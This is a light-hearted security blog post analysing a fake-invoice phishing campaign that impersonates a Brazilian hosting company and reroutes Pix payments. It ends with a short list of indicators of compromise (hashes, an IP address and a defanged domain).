class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Ah, invoices. Those delightful pieces of paper (or pixels) that remind us business is booming until one day you receive an invoice that feels just a little&#8230;fishy. Today, we&#8217;re diving into the world of fake invoice phishing campaigns, where cybercriminals craft invoices so polished they could put your favorite accounting software to shame. But don&#8217;t worry , we&#8217;re here to help you spot the tricks, share a laugh (or two), and keep your company&#8217;s funds safely out of the clutches of these digital scoundrels.</p><div><hr></div><h2><strong>The Anatomy of a Deceptively Legitimate Invoice</strong></h2><p>Picture this: You open your inbox, and there it is, a pristine invoice for services you vaguely remember discussing. It is adorned with logos, professional fonts, and even that convincing "due by" date. But wait... something's off. Fake invoice phishing campaigns operate on this very premise, preying on human tendencies to trust what appears professional. Instead of rendering an actual service, these bogus invoices are nothing more than digital traps designed to make your finance team sign away your hard earned cash. <br><br>Let&#8217;s take a closer look:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!rl-M!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48caf05d-92f6-4cd1-a9ac-a1a68149c8d2_1267x874.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!rl-M!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48caf05d-92f6-4cd1-a9ac-a1a68149c8d2_1267x874.png 424w, https://substackcdn.com/image/fetch/$s_!rl-M!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48caf05d-92f6-4cd1-a9ac-a1a68149c8d2_1267x874.png 848w, https://substackcdn.com/image/fetch/$s_!rl-M!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48caf05d-92f6-4cd1-a9ac-a1a68149c8d2_1267x874.png 1272w, https://substackcdn.com/image/fetch/$s_!rl-M!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48caf05d-92f6-4cd1-a9ac-a1a68149c8d2_1267x874.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!rl-M!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48caf05d-92f6-4cd1-a9ac-a1a68149c8d2_1267x874.png" width="640" height="441.48382004735595" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/48caf05d-92f6-4cd1-a9ac-a1a68149c8d2_1267x874.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:874,&quot;width&quot;:1267,&quot;resizeWidth&quot;:640,&quot;bytes&quot;:56237,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!rl-M!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48caf05d-92f6-4cd1-a9ac-a1a68149c8d2_1267x874.png 424w, https://substackcdn.com/image/fetch/$s_!rl-M!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48caf05d-92f6-4cd1-a9ac-a1a68149c8d2_1267x874.png 848w, https://substackcdn.com/image/fetch/$s_!rl-M!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48caf05d-92f6-4cd1-a9ac-a1a68149c8d2_1267x874.png 1272w, https://substackcdn.com/image/fetch/$s_!rl-M!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48caf05d-92f6-4cd1-a9ac-a1a68149c8d2_1267x874.png 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!soZn!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3234762-674e-416b-bafa-a875ad778956_400x233.gif" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!soZn!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3234762-674e-416b-bafa-a875ad778956_400x233.gif 424w, https://substackcdn.com/image/fetch/$s_!soZn!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3234762-674e-416b-bafa-a875ad778956_400x233.gif 848w, https://substackcdn.com/image/fetch/$s_!soZn!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3234762-674e-416b-bafa-a875ad778956_400x233.gif 1272w, https://substackcdn.com/image/fetch/$s_!soZn!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3234762-674e-416b-bafa-a875ad778956_400x233.gif 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!soZn!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3234762-674e-416b-bafa-a875ad778956_400x233.gif" width="400" height="233" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f3234762-674e-416b-bafa-a875ad778956_400x233.gif&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:233,&quot;width&quot;:400,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:2007626,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/gif&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!soZn!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3234762-674e-416b-bafa-a875ad778956_400x233.gif 424w, https://substackcdn.com/image/fetch/$s_!soZn!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3234762-674e-416b-bafa-a875ad778956_400x233.gif 848w, https://substackcdn.com/image/fetch/$s_!soZn!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3234762-674e-416b-bafa-a875ad778956_400x233.gif 1272w, https://substackcdn.com/image/fetch/$s_!soZn!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3234762-674e-416b-bafa-a875ad778956_400x233.gif 1456w" sizes="100vw"></picture><div></div></div></a></figure></div><p><em>&#8220;Look at that subtle off-white coloring. The tasteful thickness of it. Oh my God, it even has a <s>watermark</s> QR Code&#8221;</em><br></p><p>The attackers have truly mastered the art of deception. They blend in seamlessly with everyday communications, exploiting our natural inclination to act on what seems routine. It is like receiving a birthday card from a "long lost relative" who suddenly demands payment for a surprise party, charming on paper but disastrous in practice, Lets see <em><s>Paul Allen&#8217;s card</s> </em>the attached PDF:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!NTu5!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb6277958-fe10-4c82-93de-aa851ca4be84_667x914.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!NTu5!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb6277958-fe10-4c82-93de-aa851ca4be84_667x914.png 424w, https://substackcdn.com/image/fetch/$s_!NTu5!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb6277958-fe10-4c82-93de-aa851ca4be84_667x914.png 848w, https://substackcdn.com/image/fetch/$s_!NTu5!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb6277958-fe10-4c82-93de-aa851ca4be84_667x914.png 1272w, https://substackcdn.com/image/fetch/$s_!NTu5!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb6277958-fe10-4c82-93de-aa851ca4be84_667x914.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!NTu5!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb6277958-fe10-4c82-93de-aa851ca4be84_667x914.png" width="667" height="914" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b6277958-fe10-4c82-93de-aa851ca4be84_667x914.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:914,&quot;width&quot;:667,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:103227,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!NTu5!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb6277958-fe10-4c82-93de-aa851ca4be84_667x914.png 424w, https://substackcdn.com/image/fetch/$s_!NTu5!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb6277958-fe10-4c82-93de-aa851ca4be84_667x914.png 848w, https://substackcdn.com/image/fetch/$s_!NTu5!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb6277958-fe10-4c82-93de-aa851ca4be84_667x914.png 1272w, https://substackcdn.com/image/fetch/$s_!NTu5!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb6277958-fe10-4c82-93de-aa851ca4be84_667x914.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p></p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!XbFZ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F79f41ca3-0a0e-45f0-9c11-602c55d52580_220x188.gif" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!XbFZ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F79f41ca3-0a0e-45f0-9c11-602c55d52580_220x188.gif 424w, https://substackcdn.com/image/fetch/$s_!XbFZ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F79f41ca3-0a0e-45f0-9c11-602c55d52580_220x188.gif 848w, https://substackcdn.com/image/fetch/$s_!XbFZ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F79f41ca3-0a0e-45f0-9c11-602c55d52580_220x188.gif 1272w, https://substackcdn.com/image/fetch/$s_!XbFZ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F79f41ca3-0a0e-45f0-9c11-602c55d52580_220x188.gif 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!XbFZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F79f41ca3-0a0e-45f0-9c11-602c55d52580_220x188.gif" width="220" height="188" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/79f41ca3-0a0e-45f0-9c11-602c55d52580_220x188.gif&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:false,&quot;imageSize&quot;:&quot;normal&quot;,&quot;height&quot;:188,&quot;width&quot;:220,&quot;resizeWidth&quot;:220,&quot;bytes&quot;:195659,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/gif&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!XbFZ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F79f41ca3-0a0e-45f0-9c11-602c55d52580_220x188.gif 424w, https://substackcdn.com/image/fetch/$s_!XbFZ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F79f41ca3-0a0e-45f0-9c11-602c55d52580_220x188.gif 848w, https://substackcdn.com/image/fetch/$s_!XbFZ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F79f41ca3-0a0e-45f0-9c11-602c55d52580_220x188.gif 1272w, https://substackcdn.com/image/fetch/$s_!XbFZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F79f41ca3-0a0e-45f0-9c11-602c55d52580_220x188.gif 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><em>      Something wrong, Patrick? You&#8217;re sweating<br><br><br><strong>Yes, </strong></em><strong>A lot..Maybe?<br><br></strong>In this case, our detection system in the background raised a red flag that made us pause and take a second look, yet with just a minuscule enough discrepancy to warrant deeper investigation. It was like being in the middle of an elite business card exchange and suddenly spotting one card that just didn&#8217;t measure up:<br></p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!gkbg!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3646c449-5d35-4db4-9314-7ab476614796_567x77.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!gkbg!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3646c449-5d35-4db4-9314-7ab476614796_567x77.png 424w, https://substackcdn.com/image/fetch/$s_!gkbg!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3646c449-5d35-4db4-9314-7ab476614796_567x77.png 848w, https://substackcdn.com/image/fetch/$s_!gkbg!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3646c449-5d35-4db4-9314-7ab476614796_567x77.png 1272w, https://substackcdn.com/image/fetch/$s_!gkbg!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3646c449-5d35-4db4-9314-7ab476614796_567x77.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!gkbg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3646c449-5d35-4db4-9314-7ab476614796_567x77.png" width="567" height="77" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/3646c449-5d35-4db4-9314-7ab476614796_567x77.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:77,&quot;width&quot;:567,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:15975,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!gkbg!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3646c449-5d35-4db4-9314-7ab476614796_567x77.png 424w, https://substackcdn.com/image/fetch/$s_!gkbg!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3646c449-5d35-4db4-9314-7ab476614796_567x77.png 848w, https://substackcdn.com/image/fetch/$s_!gkbg!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3646c449-5d35-4db4-9314-7ab476614796_567x77.png 1272w, https://substackcdn.com/image/fetch/$s_!gkbg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3646c449-5d35-4db4-9314-7ab476614796_567x77.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a><figcaption class="image-caption">The terms in English are: invoice, today, payment.</figcaption></figure></div><p>Why such a delicate, well crafted, allegedly expected and totally legitimate invoice come from a newly generated domain?<br></p><p><strong>Launch the CAPTURE:</strong><br><br>Using our &#8220;proprietary&#8221; CAPTURE system (Centralized Analysis for Phishing Tactics Uncovering Red hErrings), we intercepted <strong>an official invoice?!</strong>. And yes, the QR code was <strong>official too</strong> sourced directly from Pix. </p><p>You heard that right. So where's the catch? Well, just follow the money: the payment destination details were altered, rerouting funds to our dear friends. A deeper dive into the indicators of compromise revealed the following:</p><p>A centralized phishing operation based in Eastern Europe that is actively impersonating multiple trusted brands to distribute fraudulent invoices. One of their latest templates impersonates a well known Brazilian hosting company and uses Santander Bank accounts along with the Pix payment application to route payments through a legitimate QR code. If a cautious user attempts to investigate further, the fake website quickly redirects them to the legitimate site, reinforcing the illusion of authenticity. The domain itself appears to be DGA-generated a hallmark of automated, ever changing phishing campaigns.</p><p>This isn&#8217;t their first rodeo. The same campaign has previously posed as the Czech Postage Service (&#268;esk&#225; po&#353;ta), Australia Post (Aus Post), UPS, various delivery tracking services, and even Netflix. Adding insult to injury, the servers behind these scams are operated by the Moldavian company ALEXHOST SRL. These servers have a history of distributing malware such as the Trojan Downloader Morila, which remains active in the wild today. What a plot twist huh?<strong><br></strong></p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!I0th!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc96b6726-0b45-4e11-9010-0d04760a4300_245x240.gif" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!I0th!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc96b6726-0b45-4e11-9010-0d04760a4300_245x240.gif 424w, https://substackcdn.com/image/fetch/$s_!I0th!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc96b6726-0b45-4e11-9010-0d04760a4300_245x240.gif 848w, https://substackcdn.com/image/fetch/$s_!I0th!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc96b6726-0b45-4e11-9010-0d04760a4300_245x240.gif 1272w, https://substackcdn.com/image/fetch/$s_!I0th!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc96b6726-0b45-4e11-9010-0d04760a4300_245x240.gif 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!I0th!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc96b6726-0b45-4e11-9010-0d04760a4300_245x240.gif" width="320" height="313.469387755102" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/c96b6726-0b45-4e11-9010-0d04760a4300_245x240.gif&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:240,&quot;width&quot;:245,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:507412,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/gif&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!I0th!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc96b6726-0b45-4e11-9010-0d04760a4300_245x240.gif 424w, https://substackcdn.com/image/fetch/$s_!I0th!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc96b6726-0b45-4e11-9010-0d04760a4300_245x240.gif 848w, https://substackcdn.com/image/fetch/$s_!I0th!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc96b6726-0b45-4e11-9010-0d04760a4300_245x240.gif 1272w, https://substackcdn.com/image/fetch/$s_!I0th!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc96b6726-0b45-4e11-9010-0d04760a4300_245x240.gif 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>                                            But I look so impeccably professional!<br><em>                                     <br></em><br><strong>Conclusion</strong>: Stay Sharp and Scrutinize <strong>Everything</strong></p><p>In our ever evolving digital landscape, fake invoice phishing campaigns remind us that a polished exterior does not guarantee legitimacy. Just like that unforgettable business card scene , it&#8217;s essential to scrutinize every detail before handing over your hard earned money. Next time you receive an invoice that seems flawless, take a moment to review every element because a little vigilance goes a long way in keeping your finances safe.</p><p>Keep your eyes sharp, your skepticism high, and remember: in the world of phishing, every detail counts even if it means channeling your inner Patrick Bateman.</p><p>Happy (and secure) invoicing!</p><div><hr></div><h2>IOCs</h2><pre><code>8b7078d1598b4a61fb5caf9f676bfa5fa0b4e0807ad3bb3f27795c7fbbe9a4a9&#9;&#9;&#9;ecdf0573ee874850cddec849079f1443a69fad9b7378ad6c530af65f65c3509a&#9;&#9;&#9;91.208.184.248&#9;
registrodewesite[.]shop
